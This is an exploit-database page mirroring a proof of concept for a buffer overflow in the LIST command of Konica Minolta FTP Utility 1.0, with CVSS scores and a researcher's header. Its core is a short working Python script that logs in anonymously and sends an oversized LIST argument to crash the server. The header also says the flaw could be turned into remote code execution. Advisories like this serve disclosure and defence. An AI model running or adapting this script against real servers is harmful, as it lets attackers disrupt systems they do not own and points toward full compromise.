Advertisement






Konica Minolta FTP Utility v1.0 - 'LIST' Denial of Service (PoC)

CVE Category Price Severity
CWE-399 Not specified High
Author Risk Exploitation Type Date
Unknown High Remote 2020-05-19
CPE
cpe:cpe:/a:konica_minolta:ftp_utility:1.0.039
CVSS EPSS EPSSP
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 0.405 0.78984

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2020050152

Below is a copy:

Konica Minolta FTP Utility v1.0 - 'LIST' Denial of Service (PoC)
====================================================================================================
=============== [ Konica Minolta FTP Utility v1.0 - 'LIST' Denial of Service (PoC) ] ===============
====================================================================================================

# Exploit Title: Konica Minolta FTP Utility v1.0 - 'LIST' Denial of Service (PoC) 
# Date: [05-16-2020]
#
# Found by: Alvaro J. Gene (Socket_0x03)
# Email: Socket_0x03 (at) teraexe (dot) com
# Website: www (dot) teraexe (dot) com
# 
# Software Link: https://konica-minolta-ftp-utility.software.informer.com/download/
# Vulnerable Application: Konica Minolta FTP Utility
# Version: 1.0
# Server: FTP Server
# Vulnerable Command: LIST
# Tested on: Windows 7 SP1
# 
# Impact: There is a buffer overflow vulnerability in the LIST command of the FTP server
# "Konica Minolta FTP Utility" that will allow an attacker to overwrite some registers, 
# such as EAX, ESI, EDI... Even though the next codes will crash the FTP server and overwrite 
# some registers, an individual can use the vulnerable command to build a remote buffer 
# overflow exploit that will root a system without any user interaction. 


from ftplib import FTP

ftp = FTP('192.168.0.16')

buffer = "A" * 1500

ftp.login()

ftp.retrlines('LIST ' + buffer)

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.